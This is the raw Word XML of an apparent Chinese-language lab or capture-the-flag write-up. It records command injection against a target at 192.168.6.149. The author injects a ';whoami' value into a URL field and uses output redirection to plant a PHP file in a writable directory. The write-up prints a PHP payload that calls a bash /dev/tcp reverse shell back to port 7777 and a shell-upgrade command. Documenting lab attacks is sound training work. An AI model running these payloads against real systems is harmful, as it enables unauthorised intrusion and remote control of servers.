      <w:r w:rsidR="00C87358" w:rsidRPr="00C87358">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>test.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将一个简易的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C87358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语句写入到文件</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C87358">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>test.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中。然后</w:t>
      </w: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中执行命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 -m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http.serve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6666</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，打开一个简易的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>服务器，端口为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 6666</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>（执行该命令时所在的目录将会作为该服务器的根目录）。</w:t>
      </w:r>
      <w:r w:rsidR="00C87358">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C87358"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中输入该</w:t>
      </w:r>
      <w:r w:rsidR="00C87358">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidR="00C87358">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，即</w:t>
      </w:r>
      <w:r w:rsidR="00C87358">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>192.168.6.149:6666/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C87358">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>test.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查看，可以看到确实会访问这个外部页面，但是</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C87358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C87358">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>的语句</w:t>
      </w:r>
      <w:r w:rsidR="00546024">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>并</w:t>
      </w:r>
      <w:r w:rsidR="00C87358">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>没有执行</w:t>
      </w:r>
      <w:r w:rsidR="00E20024">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00546024">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>可能是后端没有解析下载的</w:t>
      </w:r>
      <w:r w:rsidR="00546024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546024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546024">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>而只是打印出来，</w:t>
      </w:r>
      <w:r w:rsidR="00E20024">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>因此直接通过远程文件包含进行命令执行的方式不可行</w:t>
      </w:r>
      <w:r w:rsidR="00C87358">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4757A6" w14:textId="77777777" w:rsidR="00E95DF6" w:rsidRDefault="00C8735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2CAC2AB" wp14:editId="160A10DD">
            <wp:extent cx="4114800" cy="962025"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="2877075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07528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362A" w14:textId="579EA325" w:rsidR="006B5186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1026B7B" w14:textId="77777777" w:rsidR="00E95DF6" w:rsidRDefault="00C8735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5081149" wp14:editId="65E129CA">
            <wp:extent cx="4733925" cy="628650"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="176791145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11450" name="图片 1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02A9" w14:textId="308D4594" w:rsidR="00C87358" w:rsidRPr="00C87358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163BF241" w14:textId="77777777" w:rsidR="00E95DF6" w:rsidRDefault="00C8735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F432F0B" wp14:editId="625299AF">
            <wp:extent cx="5274310" cy="2526665"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="107917073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0731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2C8" w14:textId="122B620F" w:rsidR="006B5186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C8365F6" w14:textId="77777777" w:rsidR="00E95DF6" w:rsidRDefault="00C87358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3489830B" wp14:editId="2987B548">
            <wp:extent cx="5274310" cy="2058035"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="187754308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3086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874" w14:textId="0DED25E4" w:rsidR="00C87358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000CBCFC" w14:textId="45421F21" w:rsidR="00546024" w:rsidRDefault="00546024" w:rsidP="00546024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还有一种可能是当靶机在下载用户输入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内容时，会直接搭配用户输入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下载网页内容而不对该输入进行过滤，如果构造合适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就可以实现远程代码执行。因此尝试输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192.168.6.149:6666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est.php;whoam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返回的内容是无效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看来后端是过滤了这些特殊符号的，但不一定代表符合过滤的很全面。这里尝试各种符号看看哪些符号不会出现该报错。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>由于在</w:t>
      </w:r>
      <w:r w:rsidRPr="00546024">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00546024">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00546024">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:instrText>REF _Ref173153715 \w \h</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00546024">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00546024">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="00546024">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> \* MERGEFORMAT </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00546024">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00546024">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1.3</w:t>
      </w:r>
      <w:r w:rsidRPr="00546024">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs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fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> REF _Ref173153715 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> \* MERGEFORMAT </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00546024">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="00546024">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>eb</w:t>
      </w:r>
      <w:r w:rsidRPr="00546024">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>路径扫描</w:t>
      </w:r>
      <w:r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</w:rPr>
        <w:t>中存在一个空目录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可以访问，所以我们尝试重定向符号</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>。如果能将</w:t>
      </w:r>
      <w:r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重定向到该目录下，就可以通过访问该目录实现远程代码执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5E55C2" w14:textId="3450D219" w:rsidR="00546024" w:rsidRPr="00546024" w:rsidRDefault="00546024" w:rsidP="009F4B03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 w:rsidR="00737F3D" w:rsidRPr="00737F3D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>192.168.6.149:6666/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00737F3D" w:rsidRPr="00737F3D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>test.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00737F3D" w:rsidRPr="00737F3D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00737F3D" w:rsidRPr="00737F3D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00737F3D" w:rsidRPr="00737F3D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00737F3D" w:rsidRPr="00737F3D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>test.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00737F3D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，然后访问</w:t>
      </w:r>
      <w:r w:rsidR="00737F3D" w:rsidRPr="00737F3D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>192.168.6.149:6666/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00737F3D" w:rsidRPr="00737F3D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="00737F3D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>mp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009F4B03">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，发现成功写入了，点击该文件后发现写入的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009F4B03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9F4B03">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>文件被成功执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2684B0" w14:textId="77777777" w:rsidR="00E95DF6" w:rsidRDefault="00546024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1D84F87B" wp14:editId="10DE1279">
            <wp:extent cx="5274310" cy="3093720"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="122767408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74080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63A4" w14:textId="60C40115" w:rsidR="00546024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173E401B" w14:textId="77777777" w:rsidR="00E95DF6" w:rsidRDefault="00546024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C7271F2" wp14:editId="2A2FE92A">
            <wp:extent cx="5274310" cy="2028825"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="209909168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91684" name="图片 1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18B6" w14:textId="211D3346" w:rsidR="006B5186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1325365C" w14:textId="77777777" w:rsidR="00E95DF6" w:rsidRDefault="00737F3D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422340FA" wp14:editId="08F83DB5">
            <wp:extent cx="5274310" cy="3277870"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1168198232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8232" name="图片 1" descr="图形用户界面, 文本, 应用程序, 聊天或短信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DCC" w14:textId="0EA23DDD" w:rsidR="00E77D02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5A8150BD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5CC5844" wp14:editId="6BBD45BC">
            <wp:extent cx="5274310" cy="2847975"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="76853933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9333" name="图片 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673F" w14:textId="369FCEB3" w:rsidR="00E77D02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219ACE47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5AB3A986" wp14:editId="5602CB6C">
            <wp:extent cx="4162425" cy="1704975"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="105965874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58747" name="图片 1" descr="图形用户界面, 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12F3" w14:textId="6CF8BAE0" w:rsidR="00E77D02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535B5F38" w14:textId="77777777" w:rsidR="009F4B03" w:rsidRDefault="009F4B03" w:rsidP="009F4B03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接下来重新构造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语句实现反弹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，输入命令</w:t>
      </w:r>
      <w:r w:rsidRPr="009F4B03">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>echo "&lt;?</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009F4B03">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009F4B03">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009F4B03">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>system(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009F4B03">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'bash -c \'bash -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009F4B03">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009F4B03">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt;&amp; /dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009F4B03">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009F4B03">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">/192.168.6.149/7777 0&gt;&amp;1\''); ?&gt;" &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009F4B03">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>shell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将反弹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命令写入到文件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hell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，输入命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 -m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http.serve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6666</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>打开简易的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>服务器。然后在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中运行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7777</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>监听</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>7777</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>端口。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B82345A" w14:textId="10DFF49C" w:rsidR="009F4B03" w:rsidRDefault="009F4B03" w:rsidP="009F4B03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接下来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输入恶意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为</w:t>
      </w:r>
      <w:r w:rsidRPr="00737F3D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>192.168.6.149:6666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hell</w:t>
      </w:r>
      <w:r w:rsidRPr="00737F3D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00737F3D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00737F3D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00737F3D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman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hell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反弹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文件被成功写入，点击执行，成功获得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的权限。输入命令</w:t>
      </w:r>
      <w:r w:rsidRPr="009F4B03">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>script -qc '/bin/bash -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009F4B03">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009F4B03">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>' /dev/null</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>以获得一个交互式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CC7D314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D8487CC" wp14:editId="74BD478E">
            <wp:extent cx="5274310" cy="980440"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="16106981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8110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72D9" w14:textId="0A1144E8" w:rsidR="009F4B03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0A8CB329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CAB1069" wp14:editId="6CF4CAA2">
            <wp:extent cx="2457450" cy="571500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="11475473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7351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B58B" w14:textId="147910B3" w:rsidR="009F4B03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2AFC27FE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3E49E233" wp14:editId="2A786724">
            <wp:extent cx="5274310" cy="3399790"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="86132316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23168" name="图片 1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4578" w14:textId="182D7424" w:rsidR="009F4B03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7FBDF26E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6967A51" wp14:editId="13CF9D21">
            <wp:extent cx="5274310" cy="1064260"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="20735142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14208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32A" w14:textId="6FA971E9" w:rsidR="009F4B03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165F210C" w14:textId="77777777" w:rsidR="00E95DF6" w:rsidRDefault="009F4B03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6BA7826" wp14:editId="5406D021">
            <wp:extent cx="5274310" cy="1692910"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
